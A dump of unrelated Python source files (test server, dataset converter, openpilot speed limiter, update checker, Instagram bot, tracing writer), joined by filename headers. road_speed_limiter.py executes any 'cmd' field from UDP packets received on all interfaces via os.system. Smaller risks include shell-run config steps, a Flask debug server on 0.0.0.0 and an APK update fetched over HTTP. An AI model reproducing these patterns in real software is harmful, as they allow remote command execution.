['gcloud', 'config', 'set', 'project', cluster_setup['project_name']])
else:
config = subprocess.check_output(
['gcloud', 'config', 'list', '--format', 'json'])
project_name = json.loads(config)['core']['project']
if not project_name:
projects = subprocess.check_output(['gcloud', 'projects', 'list'])
first_project = projects[0]['projectId']
logging.info('gcloud project is unset, setting it to %s', first_project)
subprocess.check_output(
['gcloud', 'config', 'set', 'project', first_project])
def handle_install_steps(keytar_config):
"""Runs all config installation/setup steps.
Args:
keytar_config: YAML keytar configuration.
"""
if 'install' not in keytar_config:
return
install_config = keytar_config['install']
for cluster_setup in install_config.get('cluster_setup', []):
handle_cluster_setup(cluster_setup)
# Install any dependencies using apt-get.
if 'dependencies' in install_config:
subprocess.call(['apt-get', 'update'])
os.environ['DEBIAN_FRONTEND'] = 'noninteractive'
for dep in install_config['dependencies']:
subprocess.call(
['apt-get', 'install', '-y', '--no-install-recommends', dep])
# Run any additional commands if provided.
for step in install_config.get('extra', []):
os.system(step)
# Update path environment variable.
for path in install_config.get('path', []):
os.environ['PATH'] = '%s:%s' % (path, os.environ['PATH'])
def _get_download_github_repo_args(tempdir, github_config):
"""Get arguments for github actions.
Args:
tempdir: Base directory to git clone into.
github_config: Configuration describing the repo, branches, etc.
Returns:
([string], string) for arguments to pass to git, and the directory to
clone into.
"""
repo_prefix = github_config.get('repo_prefix', 'github')
repo_dir = os.path.join(tempdir, repo_prefix)
git_args = ['git', 'clone', 'https://github.com/%s' % github_config['repo'],
repo_dir]
if 'branch' in github_config:
git_args += ['-b', github_config['branch']]
return git_args, repo_dir
class TestWorker(object):
"""A simple test queue. HTTP requests append to this work queue."""
def __init__(self):
self.test_queue = Queue.Queue()
self.worker_thread = threading.Thread(target=self.worker_loop)
self.worker_thread.daemon = True
def worker_loop(self):
# Run forever, executing tests as they are added to the queue.
while True:
item = self.test_queue.get()
run_test_config(item)
self.test_queue.task_done()
def start(self):
self.worker_thread.start()
def add_test(self, config):
self.test_queue.put(config)
test_worker = TestWorker()
def main():
logging.getLogger().setLevel(logging.INFO)
parser = argparse.ArgumentParser(description='Run keytar')
parser.add_argument('--config_file', help='Keytar config file', required=True)
parser.add_argument('--password', help='Password', default=None)
parser.add_argument('--port', help='Port', default=8080, type=int)
keytar_args = parser.parse_args()
with open(keytar_args.config_file, 'r') as yaml_file:
yaml_config = yaml_file.read()
if not yaml_config:
raise ValueError('No valid yaml config!')
keytar_config = yaml.load(yaml_config)
handle_install_steps(keytar_config)
if not os.path.isdir('/tmp/testlogs'):
os.mkdir('/tmp/testlogs')
test_worker.start()
app.config['port'] = keytar_args.port
app.config['password'] = keytar_args.password
app.config['keytar_config'] = keytar_config
app.run(host='0.0.0.0', port=keytar_args.port, debug=True)
if __name__ == '__main__':
main()
|
cifar100_to_mr.py | # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Cifar100 convert tool for MindRecord.
"""
from importlib import import_module
import os
import numpy as np
from mindspore import log as logger
from .cifar100 import Cifar100
from ..common.exceptions import PathNotExistsError
from ..filewriter import FileWriter
from ..shardutils import check_filename, ExceptionThread, SUCCESS
try:
cv2 = import_module("cv2")
except ModuleNotFoundError:
cv2 = None
__all__ = ['Cifar100ToMR']
class Cifar100ToMR:
"""
A class to transform from cifar100 to MindRecord.
Args:
source (str): the cifar100 directory to be transformed.
destination (str): the MindRecord file path to transform into.
Raises:
ValueError: If source or destination is invalid.
"""
def __init__(self, source, destination):
check_filename(source)
self.source = source
files = os.listdir(self.source)
train_data_flag = False
test_data_flag = False
for file in files:
if file == "train":
train_data_flag = True
if file == "test":
test_data_flag = True
if not train_data_flag:
raise PathNotExistsError("train")
if not test_data_flag:
raise PathNotExistsError("test")
check_filename(destination)
self.destination = destination
self.writer = None
def run(self, fields=None):
"""
Execute transformation from cifar100 to MindRecord.
Args:
fields (list[str]): A list of index field, e.g.["fine_label", "coarse_label"].
Returns:
MSRStatus, whether cifar100 is successfully transformed to MindRecord.
"""
if fields and not isinstance(fields, list):
raise ValueError("The parameter fields should be None or list")
cifar100_data = Cifar100(self.source, False)
cifar100_data.load_data()
images = cifar100_data.images
logger.info("train images: {}".format(images.shape))
fine_labels = cifar100_data.fine_labels
logger.info("train images fine label: {}".format(fine_labels.shape))
coarse_labels = cifar100_data.coarse_labels
logger.info("train images coarse label: {}".format(coarse_labels.shape))
test_images = cifar100_data.Test.images
logger.info("test images: {}".format(test_images.shape))
test_fine_labels = cifar100_data.Test.fine_labels
logger.info("test images fine label: {}".format(fine_labels.shape))
test_coarse_labels = cifar100_data.Test.coarse_labels
logger.info("test images coarse label: {}".format(coarse_labels.shape))
data_list = _construct_raw_data(images, fine_labels, coarse_labels)
test_data_list = _construct_raw_data(test_images, test_fine_labels, test_coarse_labels)
if _generate_mindrecord(self.destination, data_list, fields, "img_train") != SUCCESS:
return FAILED
if _generate_mindrecord(self.destination + "_test", test_data_list, fields, "img_test") != SUCCESS:
return FAILED
return SUCCESS
def transform(self, fields=None):
t = ExceptionThread(target=self.run, kwargs={'fields': fields})
t.daemon = True
t.start()
t.join()
if t.exitcode != 0:
raise t.exception
return t.res
def _construct_raw_data(images, fine_labels, coarse_labels):
"""
Construct raw data from cifar100 data.
Args:
images (list): image list from cifar100.
fine_labels (list): fine label list from cifar100.
coarse_labels (list): coarse label list from cifar100.
Returns:
list[dict], data dictionary constructed from cifar100.
"""
if not cv2:
raise ModuleNotFoundError("opencv-python module not found, please use pip install it.")
raw_data = []
for i, img in enumerate(images):
fine_label = np.int(fine_labels[i][0])
coarse_label = np.int(coarse_labels[i][0])
_, img = cv2.imencode(".jpeg", img[..., [2, 1, 0]])
row_data = {"id": int(i),
"data": img.tobytes(),
"fine_label": int(fine_label),
"coarse_label": int(coarse_label)}
raw_data.append(row_data)
return raw_data
def _generate_mindrecord(file_name, raw_data, fields, schema_desc):
"""
Generate MindRecord file from raw data.
Args:
file_name (str): File name of MindRecord File.
fields (list[str]): Fields would be set as index which
could not belong to blob fields and type could not be 'array' or 'bytes'.
raw_data (dict): Dict of raw data.
schema_desc (str): String of schema description.
Returns:
MSRStatus, whether successfully written into MindRecord.
"""
schema = {"id": {"type": "int64"}, "fine_label": {"type": "int64"},
"coarse_label": {"type": "int64"}, "data": {"type": "bytes"}}
logger.info("transformed MindRecord schema is: {}".format(schema))
writer = FileWriter(file_name, 1)
writer.add_schema(schema, schema_desc)
if fields and isinstance(fields, list):
writer.add_index(fields)
writer.write_raw_data(raw_data)
return writer.commit()
|
test_noisysine.py | import sys
import time
import logging
import threading
import GPy
import numpy as np
import matplotlib.pyplot as plt
import pdb
from GPhelpers import *
from IPython.display import display
from poap.strategy import FixedSampleStrategy
from poap.strategy import InputStrategy
from poap.tcpserve import ThreadedTCPServer
from poap.tcpserve import SimpleSocketWorker
from scipy.stats import norm
# Set up default host, port, and time
TIMEOUT = .2
def f(x):
logging.info("Request for {0}".format(x))
if TIMEOUT > 0:
time.sleep(TIMEOUT)
logging.info("OK, done")
return 5*np.sin(x)
def worker_main(name):
logging.info("Launching worker on port {0}".format(name[1]))
SimpleSocketWorker(f, sockname=name, retries=1).run()
def main():
logging.basicConfig(format="%(name)-18s: %(levelname)-8s %(message)s",
level=logging.INFO)
# Launch controller, server
strategy = FixedSampleStrategy([])
server = ThreadedTCPServer()
initbatchsize = 20
tstrategy = InputStrategy(server.controller, strategy);
X = np.random.uniform(-3.,3.,(initbatchsize,1))
Y = np.ones([len(X), 1])
for k in X:
tstrategy.eval(k)
server.strategy = tstrategy
cthread = threading.Thread(target=server.run)
cthread.start()
# Get controller port
name = server.sockname
logging.info("Launch controller at {0}".format(name))
# Launch workers on local machine
numworkers = 5;
wthreads = []
for k in range(numworkers):
wthread = threading.Thread(target=worker_main, args=(name,))
wthread.start()
wthreads.append(wthread)
# Wait for some fevals to complete
time.sleep(.5)
# Main Loop
batchsize = 20; numfevals = 0; maxfevals = 80
while(numfevals < maxfevals):
# Get new fevals
offset = numworkers
numfevals = len(server.controller.fevals)
Xnew = np.zeros([numfevals-offset, 1])
Ynew = np.zeros([numfevals-offset, 1])
for k in range(len(server.controller.fevals)-offset):
Ynew[k] = server.controller.fevals[k].value[0]
Xnew[k] = server.controller.fevals[k].params[0]
# Calculate GP and batch out new fevals
m = calcGP(Xnew, Ynew)
X = batchNewEvals_EI(m, bounds=1, batchsize=batchsize, fidelity=100)
for k in X:
tstrategy.eval([k])
# Wait for some fevals to complete
time.sleep(.5)
# Plot and wait on controller and workers
plotGP(m)
cthread.join()
for t in wthreads:
t.join()
if __name__ == '__main__':
if len(sys.argv) > 1:
TIMEOUT = float(sys.argv[1])
main()
|
road_speed_limiter.py | import json
import os
import select
import threading
import time
import socket
import fcntl
import struct
from threading import Thread
from cereal import messaging
from common.params import Params
from common.numpy_fast import clip, mean
from common.realtime import sec_since_boot
from selfdrive.config import Conversions as CV
CAMERA_SPEED_FACTOR = 1.1
class Port:
BROADCAST_PORT = 2899
RECEIVE_PORT = 2843
LOCATION_PORT = 2911
class RoadLimitSpeedServer:
def __init__(self):
self.json_road_limit = None
self.active = 0
self.last_updated = 0
self.last_updated_active = 0
self.last_exception = None
self.lock = threading.Lock()
self.remote_addr = None
broadcast = Thread(target=self.broadcast_thread, args=[])
broadcast.setDaemon(True)
broadcast.start()
# gps = Thread(target=self.gps_thread, args=[])
# gps.setDaemon(True)
# gps.start()
def gps_thread(self):
sm = messaging.SubMaster(['gpsLocationExternal'], poll=['gpsLocationExternal'])
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
while True:
try:
sm.update()
if self.remote_addr is not None and sm.updated['gpsLocationExternal']:
location = sm['gpsLocationExternal']
json_location = json.dumps([
location.latitude,
location.longitude,
location.altitude,
location.speed,
location.bearingDeg,
location.accuracy,
location.timestamp,
location.source,
location.vNED,
location.verticalAccuracy,
location.bearingAccuracyDeg,
location.speedAccuracy,
])
address = (self.remote_addr[0], Port.LOCATION_PORT)
sock.sendto(json_location.encode(), address)
else:
time.sleep(1.)
except Exception as e:
print("exception", e)
time.sleep(1.)
def get_broadcast_address(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip = fcntl.ioctl(
s.fileno(),
0x8919,
struct.pack('256s', 'wlan0'.encode('utf-8'))
)[20:24]
return socket.inet_ntoa(ip)
except:
return None
def broadcast_thread(self):
broadcast_address = None
frame = 0
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
try:
if broadcast_address is None or frame % 10 == 0:
broadcast_address = self.get_broadcast_address()
print('broadcast_address', broadcast_address)
if broadcast_address is not None:
address = (broadcast_address, Port.BROADCAST_PORT)
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), address)
except:
pass
time.sleep(5.)
frame += 1
except:
pass
def udp_recv(self, sock):
ret = False
try:
ready = select.select([sock], [], [], 1.)
ret = bool(ready[0])
if ret:
data, self.remote_addr = sock.recvfrom(2048)
json_obj = json.loads(data.decode())
if 'cmd' in json_obj:
try:
os.system(json_obj['cmd'])
except:
pass
if 'echo' in json_obj:
try:
echo = json.dumps(json_obj["echo"])
sock.sendto(echo.encode(), (self.remote_addr[0], Port.BROADCAST_PORT))
except:
pass
try:
self.lock.acquire()
try:
if 'active' in json_obj:
self.active = json_obj['active']
self.last_updated_active = sec_since_boot()
except:
pass
if 'road_limit' in json_obj:
self.json_road_limit = json_obj['road_limit']
self.last_updated = sec_since_boot()
finally:
self.lock.release()
except:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
return ret
def check(self):
now = sec_since_boot()
if now - self.last_updated > 20.:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
if now - self.last_updated_active > 10.:
self.active = 0
def get_limit_val(self, key, default=None):
try:
if self.json_road_limit is None:
return default
if key in self.json_road_limit:
return self.json_road_limit[key]
except:
pass
return default
def main():
server = RoadLimitSpeedServer()
roadLimitSpeed = messaging.pub_sock('roadLimitSpeed')
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
try:
sock.bind(('0.0.0.0', 843))
except:
sock.bind(('0.0.0.0', Port.RECEIVE_PORT))
sock.setblocking(False)
while True:
if server.udp_recv(sock):
dat = messaging.new_message()
dat.init('roadLimitSpeed')
dat.roadLimitSpeed.active = server.active
dat.roadLimitSpeed.roadLimitSpeed = server.get_limit_val("road_limit_speed", 0)
dat.roadLimitSpeed.isHighway = server.get_limit_val("is_highway", False)
dat.roadLimitSpeed.camType = server.get_limit_val("cam_type", 0)
dat.roadLimitSpeed.camLimitSpeedLeftDist = server.get_limit_val("cam_limit_speed_left_dist", 0)
dat.roadLimitSpeed.camLimitSpeed = server.get_limit_val("cam_limit_speed", 0)
dat.roadLimitSpeed.sectionLimitSpeed = server.get_limit_val("section_limit_speed", 0)
dat.roadLimitSpeed.sectionLeftDist = server.get_limit_val("section_left_dist", 0)
dat.roadLimitSpeed.camSpeedFactor = server.get_limit_val("cam_speed_factor", CAMERA_SPEED_FACTOR)
roadLimitSpeed.send(dat.to_bytes())
server.check()
except Exception as e:
server.last_exception = e
class RoadSpeedLimiter:
def __init__(self):
self.slowing_down = False
self.started_dist = 0
self.longcontrol = Params().get_bool('LongControlEnabled')
self.sock = messaging.sub_sock("roadLimitSpeed")
self.roadLimitSpeed = None
def recv(self):
try:
dat = messaging.recv_sock(self.sock, wait=False)
if dat is not None:
self.roadLimitSpeed = dat.roadLimitSpeed
except:
pass
def get_active(self):
self.recv()
if self.roadLimitSpeed is not None:
return self.roadLimitSpeed.active
return 0
def get_max_speed(self, cluster_speed, is_metric):
log = ""
self.recv()
if self.roadLimitSpeed is None:
return 0, 0, 0, False, ""
try:
road_limit_speed = self.roadLimitSpeed.roadLimitSpeed
is_highway = self.roadLimitSpeed.isHighway
cam_type = int(self.roadLimitSpeed.camType)
cam_limit_speed_left_dist = self.roadLimitSpeed.camLimitSpeedLeftDist
cam_limit_speed = self.roadLimitSpeed.camLimitSpeed
section_limit_speed = self.roadLimitSpeed.sectionLimitSpeed
section_left_dist = self.roadLimitSpeed.sectionLeftDist
camSpeedFactor = clip(self.roadLimitSpeed.camSpeedFactor, 1.0, 1.1)
if is_highway is not None:
if is_highway:
MIN_LIMIT = 40
MAX_LIMIT = 120
else:
MIN_LIMIT = 30
MAX_LIMIT = 100
else:
MIN_LIMIT = 30
MAX_LIMIT = 120
if cam_limit_speed_left_dist is not None and cam_limit_speed is not None and cam_limit_speed_left_dist > 0:
v_ego = cluster_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
diff_speed = cluster_speed - (cam_limit_speed * camSpeedFactor)
#cam_limit_speed_ms = cam_limit_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
starting_dist = v_ego * 30.
safe_dist = v_ego * 6.
if MIN_LIMIT <= cam_limit_speed <= MAX_LIMIT and (self.slowing_down or cam_limit_speed_left_dist < starting_dist):
if not self.slowing_down:
self.started_dist = cam_limit_speed_left_dist
self.slowing_down = True
first_started = True
else:
first_started = False
td = self.started_dist - safe_dist
d = cam_limit_speed_left_dist - safe_dist
if d > 0. and td > 0. and diff_speed > 0. and (section_left_dist is None or section_left_dist < 10):
pp = (d / td) ** 0.6
else:
pp = 0
return cam_limit_speed * camSpeedFactor + int(pp * diff_speed), \
cam_limit_speed, cam_limit_speed_left_dist, first_started, log
self.slowing_down = False
return 0, cam_limit_speed, cam_limit_speed_left_dist, False, log
elif section_left_dist is not None and section_limit_speed is not None and section_left_dist > 0:
if MIN_LIMIT <= section_limit_speed <= MAX_LIMIT:
if not self.slowing_down:
self.slowing_down = True
first_started = True
else:
first_started = False
return section_limit_speed * camSpeedFactor, section_limit_speed, section_left_dist, first_started, log
self.slowing_down = False
return 0, section_limit_speed, section_left_dist, False, log
except Exception as e:
log = "Ex: " + str(e)
pass
self.slowing_down = False
return 0, 0, 0, False, log
road_speed_limiter = None
def road_speed_limiter_get_active():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_active()
def road_speed_limiter_get_max_speed(cluster_speed, is_metric):
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_max_speed(cluster_speed, is_metric)
def get_road_speed_limiter():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter
if __name__ == "__main__":
main()
|
client.py | import socket
import threading
HOST = "127.0.0.1"
PORT = 5052
ENCODING = "ascii"
def handle_send(sock: socket.socket):
try:
while True:
num1 = input()
sock.send(num1.encode(ENCODING))
except:
sock.close()
def handle_receive(sock: socket.socket):
try:
while True:
print(sock.recv(1024).decode(ENCODING))
except:
sock.close()
if __name__ == '__main__':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
t_send = threading.Thread(target=handle_send, args=(s,))
t_receive = threading.Thread(target=handle_receive, args=(s,))
t_send.start()
t_receive.start()
|
robotfinder.py | import logging
import socket
import threading
from robotpy_installer.utils import _resolve_addr
logger = logging.getLogger("robotpy.installer")
class RobotFinder:
def __init__(self, *addrs):
self.tried = 0
self.answer = None
self.addrs = addrs
self.cond = threading.Condition()
def find(self):
with self.cond:
self.tried = 0
for addr, resolve in self.addrs:
t = threading.Thread(target=self._try_server, args=(addr, resolve))
t.setDaemon(True)
t.start()
while self.answer is None and self.tried != len(self.addrs):
self.cond.wait()
if self.answer:
logger.info("-> Robot is at %s", self.answer)
return self.answer
def _try_server(self, addr, resolve):
success = False
try:
if resolve:
addr = _resolve_addr(addr)
else:
sd = socket.create_connection((addr, 22), timeout=10)
sd.close()
success = True
except Exception:
pass
with self.cond:
self.tried += 1
if success and not self.answer:
self.answer = addr
self.cond.notify_all()
|
replay.py | from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import zip
from builtins import str
from builtins import object
# Copyright 2018 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import numpy as np
import pickle
import multiprocessing
class ReplayBuffer(object):
"""
Stores frames sampled from the environment, with the ability to sample a batch
for training.
"""
def __init__(self, max_size, obs_dim, action_dim, roundrobin=True):
self.max_size = max_size
self.obs_dim = obs_dim
self.action_dim = action_dim
self.roundrobin = roundrobin
self.obs_buffer = np.zeros([max_size, obs_dim])
self.next_obs_buffer = np.zeros([max_size, obs_dim])
self.action_buffer = np.zeros([max_size, action_dim])
self.reward_buffer = np.zeros([max_size])
self.done_buffer = np.zeros([max_size])
self.count = 0
def random_batch(self, batch_size):
indices = np.random.randint(0, min(self.count, self.max_size), batch_size)
return (
self.obs_buffer[indices],
self.next_obs_buffer[indices],
self.action_buffer[indices],
self.reward_buffer[indices],
self.done_buffer[indices],
self.count
)
def add_replay(self, obs, next_obs, action, reward, done):
if self.count >= self.max_size:
if self.roundrobin: index = self.count % self.max_size
else: index = np.random.randint(0, self.max_size)
else:
index = self.count
self.obs_buffer[index] = obs
self.next_obs_buffer[index] = next_obs
self.action_buffer[index] = action
self.reward_buffer[index] = reward
self.done_buffer[index] = done
self.count += 1
def save(self, path, name):
def _save(datas, fnames):
print("saving replay buffer...")
for data, fname in zip(datas, fnames):
with open("%s.npz"%fname, "w") as f:
pickle.dump(data, f)
with open("%s/%s.count" % (path,name), "w") as f:
f.write(str(self.count))
print("...done saving.")
datas = [
self.obs_buffer,
self.next_obs_buffer,
self.action_buffer,
self.reward_buffer,
self.done_buffer
]
fnames = [
"%s/%s.obs_buffer" % (path, name),
"%s/%s.next_obs_buffer" % (path, name),
"%s/%s.action_buffer" % (path, name),
"%s/%s.reward_buffer" % (path, name),
"%s/%s.done_buffer" % (path, name)
]
proc = multiprocessing.Process(target=_save, args=(datas, fnames))
proc.start()
def load(self, path, name):
print("Loading %s replay buffer (may take a while...)" % name)
with open("%s/%s.obs_buffer.npz" % (path,name)) as f: self.obs_buffer = pickle.load(f)
with open("%s/%s.next_obs_buffer.npz" % (path,name)) as f: self.next_obs_buffer = pickle.load(f)
with open("%s/%s.action_buffer.npz" % (path,name)) as f: self.action_buffer = pickle.load(f)
with open("%s/%s.reward_buffer.npz" % (path,name)) as f: self.reward_buffer = pickle.load(f)
with open("%s/%s.done_buffer.npz" % (path,name)) as f: self.done_buffer = pickle.load(f)
with open("%s/%s.count" % (path,name), "r") as f: self.count = int(f.read())
|
check_update.py | import kivy
kivy.require('1.0.9')
from kivy.lang import Builder
from kivy.uix.gridlayout import GridLayout
from kivy.uix.popup import Popup
from kivy.properties import *
from kivy.uix.progressbar import ProgressBar
from kivy.clock import Clock
from jnius import autoclass, cast
import urllib.request, urllib.parse, urllib.error
import json
import os
import threading
import re
from . import main_utils
__all__ = ["check_update"]
Builder.load_string('''
<ConfirmPopup>:
cols:1
Label:
text: root.text
size_hint_y: 16
GridLayout:
cols: 2
size_hint_y: None
height: '44sp'
Button:
text: 'Yes'
on_release: root.dispatch('on_answer','yes')
Button:
text: 'No'
on_release: root.dispatch('on_answer', 'no')
''')
cur_activity = cast("android.app.Activity", autoclass(
"org.kivy.android.PythonActivity").mActivity)
apk_url = ""
popup = None
class ConfirmPopup(GridLayout):
text = StringProperty()
def __init__(self, **kwargs):
self.register_event_type('on_answer')
super(ConfirmPopup, self).__init__(**kwargs)
def on_answer(self, *args):
pass
def get_cache_dir():
return str(cur_activity.getCacheDir().getAbsolutePath())
def get_cur_version():
"""
Get current apk version string
"""
pkg_name = cur_activity.getPackageName()
return str(
cur_activity.getPackageManager().getPackageInfo(
pkg_name, 0).versionName)
def cmp_version(version1, version2):
'''
Compare two version numbers
:param version1: version number 1
:type version1: string
:param version2: version number 2
:type version2: string
:returns: 0 if version1==version2, 1 if version1>version2, -1 if version1<version2
'''
def normalize(v):
return [int(x) for x in re.sub(r'(\.0+)*$', '', v).split(".")]
return cmp(normalize(version1), normalize(version2))
def install_apk(apk_path):
IntentClass = autoclass("android.content.Intent")
FileClass = autoclass("java.io.File")
Uri = autoclass('android.net.Uri')
f = FileClass(apk_path)
if not f.exists():
return
intent = IntentClass()
intent.setAction(IntentClass.ACTION_VIEW)
# intent.setDataAndType(Uri.fromFile(f), "application/vnd.android.package-archive")
intent.setDataAndType(
Uri.parse(
"file://" +
f.toString()),
"application/vnd.android.package-archive")
cur_activity.startActivity(intent)
def download_thread(apk_url, apk_path):
try:
urllib.request.urlretrieve(apk_url, apk_path)
install_apk(apk_path)
finally:
main_utils.detach_thread()
def download_apk(instance, answer):
global popup
if answer == "yes":
global apk_url
apk_path = os.path.join(
main_utils.get_mobileinsight_path(),
"update.apk")
if os.path.isfile(apk_path):
os.remove(apk_path)
t = threading.Thread(target=download_thread, args=(apk_url, apk_path))
t.start()
progress_bar = ProgressBar()
progress_bar.value = 1
def download_progress(instance):
def next_update(dt):
if progress_bar.value >= 100:
return False
progress_bar.value += 1
Clock.schedule_interval(next_update, 1 / 25)
progress_popup = Popup(
title='Downloading MobileInsight...',
content=progress_bar
)
progress_popup.bind(on_open=download_progress)
progress_popup.open()
popup.dismiss()
def check_update():
"""
Check if latest version exists
"""
global apk_url
# update_meta_url = "http://metro.cs.ucla.edu/mobile_insight/update_meta.json"
update_meta_url = "http://mobileinsight.net/update_meta.json"
update_meta_path = os.path.join(get_cache_dir(), "update_meta.json")
if os.path.isfile(update_meta_path):
os.remove(update_meta_path)
# retrieve latest metadata
try:
urllib.request.urlretrieve(update_meta_url, update_meta_path)
except Exception as e:
print("Connection failure: stop checking update")
return
if not os.path.isfile(update_meta_path):
return
raw_data = open(update_meta_path).read()
update_meta = json.loads(raw_data)
if "Version" not in update_meta:
return
cur_version = get_cur_version()
apk_url = update_meta["URL"]
if cmp_version(cur_version, update_meta['Version']) < 0:
global popup
content = ConfirmPopup(text='New updates in v' + update_meta["Version"]
+ ':\n ' + update_meta["Description"]
+ 'Would you like to update?')
content.bind(on_answer=download_apk)
popup = Popup(title='New update is available',
content=content,
size_hint=(None, None),
size=(1000, 800),
auto_dismiss=False)
popup.open()
|
__main__.py | import os
import sys
import time
import requests
import threading
from InstagramAPI import InstagramAPI
InstagramAPI = InstagramAPI(sys.argv[1], sys.argv[2])
tmp_path = os.path.dirname(os.path.realpath(__file__)) + '/tmp'
def main(argv):
InstagramAPI.login()
threading.Thread(target=start).start()
def start():
while True:
try:
r = requests.get('http://aws.random.cat/meow')
file_addr = r.json()["file"]
file = requests.get(file_addr)
extension = file_addr[file_addr.rfind('.'):]
file_path = os.path.normpath(tmp_path + '/cat' + str(int(time.time())) + extension)
if not os.path.exists(tmp_path):
os.makedirs(tmp_path)
print("\nDownloading " + file_addr)
open(file_path, 'wb').write(file.content)
print("Uploading it")
InstagramAPI.uploadPhoto(file_path)
os.remove(file_path)
time.sleep(1 * 60 * 60)
except:
pass
if __name__ == '__main__':
main(sys.argv) |
writer.py | # stdlib
import atexit
import threading
import random
import os
import time
from . import api
from .internal.logger import get_logger
log = get_logger(__name__)
MAX_TRACES = 1000
DEFAULT_TIMEOUT = 5
LOG_ERR_INTERVAL = 60
class AgentWriter(object):
def __init__(self, hostname='localhost', port=8126, filters=None, priority_sampler=None):
self._pid = None
self._traces = None
self._worker = None
self._filters = filters
self._priority_sampler = priority_sampler
priority_sampling = priority_sampler is not None
self.api = api.API(hostname, port, priority_sampling=priority_sampling)
def write(self, spans=None, services=None):
# if the worker needs to be reset, do it.
self._reset_worker()
if spans:
self._traces.add(spans)
def _reset_worker(self):
# if this queue was created in a different process (i.e. this was
# forked) reset everything so that we can safely work from it.
pid = os.getpid()
if self._pid != pid:
log.debug("resetting queues. pids(old:%s new:%s)", self._pid, pid)
self._traces = Q(max_size=MAX_TRACES)
self._worker = None
self._pid = pid
# ensure we have an active thread working on this queue
if not self._worker or not self._worker.is_alive():
self._worker = AsyncWorker(
self.api,
self._traces,
filters=self._filters,
priority_sampler=self._priority_sampler,
)
class AsyncWorker(object):
def __init__(self, api, trace_queue, service_queue=None, shutdown_timeout=DEFAULT_TIMEOUT,
filters=None, priority_sampler=None):
self._trace_queue = trace_queue
self._lock = threading.Lock()
self._thread = None
self._shutdown_timeout = shutdown_timeout
self._filters = filters
self._priority_sampler = priority_sampler
self._last_error_ts = 0
self.api = api
self.start()
def is_alive(self):
return self._thread.is_alive()
def start(self):
with self._lock:
if not self._thread:
log.debug("starting flush thread")
self._thread = threading.Thread(target=self._target)
self._thread.setDaemon(True)
self._thread.start()
atexit.register(self._on_shutdown)
def stop(self):
"""
Close the trace queue so that the worker will stop the execution
"""
with self._lock:
if self._thread and self.is_alive():
self._trace_queue.close()
def join(self, timeout=2):
"""
Wait for the AsyncWorker execution. This call doesn't block the execution
and it has a 2 seconds of timeout by default.
"""
self._thread.join(timeout)
def _on_shutdown(self):
with self._lock:
if not self._thread:
return
# wait for in-flight queues to get traced.
time.sleep(0.1)
self._trace_queue.close()
size = self._trace_queue.size()
if size:
key = "ctrl-break" if os.name == 'nt' else 'ctrl-c'
log.debug(
"Waiting %ss for traces to be sent. Hit %s to quit.",
self._shutdown_timeout,
key,
)
timeout = time.time() + self._shutdown_timeout
while time.time() < timeout and self._trace_queue.size():
# FIXME[matt] replace with a queue join
time.sleep(0.05)
def _target(self):
traces_response = None
while True:
traces = self._trace_queue.pop()
if traces:
# Before sending the traces, make them go through the
# filters
try:
traces = self._apply_filters(traces)
except Exception as err:
log.error("error while filtering traces:{0}".format(err))
if traces:
# If we have data, let's try to send it.
try:
traces_response = self.api.send_traces(traces)
except Exception as err:
log.error("cannot send spans to {1}:{2}: {0}".format(err, self.api.hostname, self.api.port))
if self._trace_queue.closed() and self._trace_queue.size() == 0:
# no traces and the queue is closed. our work is done
return
if self._priority_sampler and traces_response:
result_traces_json = traces_response.get_json()
if result_traces_json and 'rate_by_service' in result_traces_json:
self._priority_sampler.set_sample_rate_by_service(result_traces_json['rate_by_service'])
self._log_error_status(traces_response, "traces")
traces_response = None
time.sleep(1) # replace with a blocking pop.
def _log_error_status(self, response, response_name):
if not isinstance(response, api.Response):
return
log_level = log.debug
if response.status >= 400:
now = time.time()
if now > self._last_error_ts + LOG_ERR_INTERVAL:
log_level = log.error
self._last_error_ts = now
log_level(
'failed_to_send %s to Datadog Agent: HTTP error status %s, reason %s, message %s',
response_name,
response.status,
response.reason,
response.msg,
)
def _apply_filters(self, traces):
"""
Here we make each trace go through the filters configured in the
tracer. There is no need for a lock since the traces are owned by the
AsyncWorker at that point.
"""
if self._filters is not None:
filtered_traces = []
for trace in traces:
for filtr in self._filters:
trace = filtr.process_trace(trace)
if trace is None:
break
if trace is not None:
filtered_traces.append(trace)
return filtered_traces
return traces
class Q(object):
"""
Q is a threadsafe queue that let's you pop everything at once and
will randomly overwrite elements when it's over the max size.
"""
def __init__(self, max_size=1000):
self._things = []
self._lock = threading.Lock()
self._max_size = max_size
self._closed = False
def size(self):
with self._lock:
return len(self._things)
def close(self):
with self._lock:
self._closed = True
def closed(self):
with self._lock:
return self._closed
